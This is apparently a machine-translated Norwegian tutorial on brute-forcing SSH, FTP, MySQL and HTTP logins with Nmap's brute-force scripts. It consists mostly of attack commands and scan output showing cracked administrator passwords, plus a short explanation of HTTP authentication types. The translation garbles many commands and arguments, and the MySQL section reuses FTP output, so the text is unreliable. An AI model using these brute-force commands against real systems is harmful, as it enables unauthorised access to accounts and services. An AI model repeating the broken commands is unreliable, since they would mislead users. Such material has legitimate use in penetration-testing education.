ubuntu@ubuntu: ~ $ sudo apt update && sudo apt oppgradering
ubuntu@ubuntu: ~ $ sudo apt install nmap -y
ubuntu@ubuntu: ~ $ cd/usr/share/nmap/manus/
ubuntu@ubuntu: ~ $ ls *brute *
I denne opplæringen skal vi utforske hvordan vi kan bruke NMAP til et brute-force-angrep.
SSH Brute-Force
SSH er en sikker ekstern administrasjonsprotokoll og støtter OpenSSL og passordbasert autentisering. For å brute-Force SSH-passordbasert autentisering, kan vi bruke “SSH-Brute.NSE ”NMAP -skript.
ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ssh*brute*
ssh-brute.nse
Pass brukernavn og passordliste som et argument til NMAP.
ubuntu@ubuntu: ~ $ nmap -script ssh -brute -p22 192.168.43.181
--Script-Args userDB = brukere.TXT, PASSDB = Passord.tekst
Starter NMAP 7.70 (https: // nmap.org) på 2020-02-08 17:09 PKT
NMAP Scan Report for 192.168.43.181
Verten er oppe (0.00033 -latens).
Port State Service
22/TCP Open SSH
| ssh-brute:
| Kontoer:
| Administrator: P4SSW0rd - Gyldig legitimasjon
| _ Statistikk: Utførte 99 gjetninger på 60 sekunder, gjennomsnittlig TPS: 1.7
NMAP gjort: 1 IP -adresse (1 vert) skannet i 60.17 sekunder
FTP Brute-Force
FTP er en filoverføringsprotokoll som støtter passordbasert autentisering. Til Brute-Force FTP bruker vi “FTP-Brute.NSE ”NMAP -skript.
ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*brute*
ftp-brute.nse
Pass brukernavn og passordliste som et argument til NMAP.
ubuntu@ubuntu: ~ $ nmap -script ftp -Brute -p21 192.168.43.181-Script-Args
userDB = brukere.TXT, PASSDB = Passord.tekst
Starter NMAP 7.70 (https: // nmap.org) på 2020-02-08 16:51 PKT
NMAP Scan Report for 192.168.43.181
Verten er oppe (0.00021 -latens).
Port State Service
21/TCP Open FTP
| FTP-Brute:
| Kontoer:
| Administrator: P4SSW0rd - Gyldig legitimasjon
| _ Statistikk: Utførte 99 gjetninger på 20 sekunder, gjennomsnittlig TPS: 5.0
NMAP gjort: 1 IP -adresse (1 vert) skannet i 19.50 sekunder
MySQL Brute-Force
Noen ganger blir mysql stående åpen for tilkoblinger og lar noen koble seg til den. Passordet kan bli sprukket ved hjelp av NMAP med “MySQL-Brute” -skriptet.
ubuntu@ubuntu: ~ $ sudo nmap -script mysql -Brute -p3306 192.168.43.181
--Script-Args userDB = brukere.TXT, PASSDB = Passord.tekst
Starter NMAP 7.70 (https: // nmap.org) på 2020-02-08 16:51 PKT
NMAP Scan Report for 192.168.43.181
Verten er oppe (0.00021 -latens).
Port State Service
3306/TCP Åpne MySQL
| FTP-Brute:
| Kontoer:
| Administrator: P4SSW0rd - Gyldig legitimasjon
| _ Statistikk: Utførte 99 gjetninger på 20 sekunder, gjennomsnittlig TPS: 5.0
NMAP gjort: 1 IP -adresse (1 vert) skannet i 19.40 sekunder
Http brute-styrke
HTTP bruker tre typer autentisering for å autentisere brukere til webservere. Disse metodikkene brukes i rutere, modemer og avanserte webapplikasjoner for å utveksle brukernavn og passord. Disse typene er:
Grunnleggende autentisering
I HTTP Basic Autentiseringsprotokoll koder nettleseren brukernavn og passord med Base64 og sender det under "Autorisasjon" -overskrift. Du kan se dette i følgende skjermbilde.
Autorisasjon: Grunnleggende ywrtaw46yWrTaw4 =
Du kan base64 avkode denne strengen for å se brukernavnet og passordet
ubuntu@ubuntu: ~ $ ekko ywrtaw46ywrtaw4 = | base64 -d
Administrator: Admin
HTTP grunnleggende godkjenning er usikker fordi den sender både brukernavn og passord i ren tekst. Enhver mann-i-midten angriper kan enkelt avskjære trafikken og avkode strengen for å få passordet.
Digest godkjenning
HTTP Digest -godkjenning bruker hashingteknikker for å kryptere brukernavnet og passordet før du sender det til serveren.
Hash1 = MD5 (Brukernavn: Realm: Passord)
Hash2 = MD5 (Metode: Digesturi)
Response = MD5 (Hash1: Nonce: NonCeCount: CNONCE: QOP: Hash2)
Du kan se disse verdiene under "autorisasjon" -overskriften.
Digest -basert autentisering er sikkert fordi passord ikke er sendt i ren tekst. Hvis en mann-i-midten angriper avskjærer trafikken, vil han ikke kunne få passordet.
Formbasert autentisering
Grunnleggende og fordøyende autentikasjon. Du kan bygge din egen webside i HTML eller JavaScript for å bruke dine egne kodings- og overføringsteknikker.
Vanligvis sendes data i formbasert autentisering i ren tekst. For sikkerhetsproblemer må HTTPS brukes for å forhindre angrep på midten av midten.
Vi kan brute kraft alle typer HTTP -godkjenning ved hjelp av NMAP. Vi bruker skriptet “http-brute” for det formålet.
ubuntu@ubuntu:/usr/share/nmap/script/$ ls*http*brute*
http-brute.nse
For å teste dette NMAP-skriptet, løser vi en offentlig vert Brute-Force Challenge av Pentester Academy på denne URL-http: // Pentesteracademylab.AppSpot.com/lab/webapp/basicauth.
Vi må gi alt inkludert vertsnavn, URI, forespørsel metode og ordbøker separat som et manusargument.
ubuntu@ubuntu: ~ $ sudo nmap -p80 -script http -brute pentesteracademylab.AppSpot.com
--Skript-Args HTTP-Brute.Vertsnavn = Pentesteracademylab.AppSpot.com,
http-brute.sti =/lab/webapp/basicauth, userdb = brukere.TXT, PASSDB = Passord.tekst,
http-brute.Metode = POST
Starter NMAP 7.70 (https: // nmap.org) på 2020-02-08 21:37 PKT
NMAP Scan Report for Pentesteracademylab.AppSpot.com (216.58.210.84)
Verten er oppe (0.20 -talls latens).
Andre adresser for pentesteracademylab.AppSpot.com (ikke skannet): 2a00: 1450: 4018: 803 :: 2014
RDNS -rekord for 216.58.210.84: MCT01S06-IN-F84.1E100.nett
Port State Service
80/TCP Open HTTP
| http-brute:
| Kontoer:
| Administrator: AADDD - Gyldig legitimasjon
| _ Statistikk: Utførte 165 gjetninger på 29 sekunder, gjennomsnittlig TPS: 5.3
NMAP gjort: 1 IP -adresse (1 vert) skannet i 31.22 sekunder
Konklusjon
NMAP kan brukes til å gjøre mange ting til tross for bare enkel portskanning. Det kan erstatte Metasploit, Hydra, Medusa og mange andre verktøy laget spesielt for online brute -tvang. NMAP har enkle, brukervennlige innebygde skript som brute-force nesten hver tjeneste inkludert HTTP, Telel, SSH, MySQL, Samba og andre.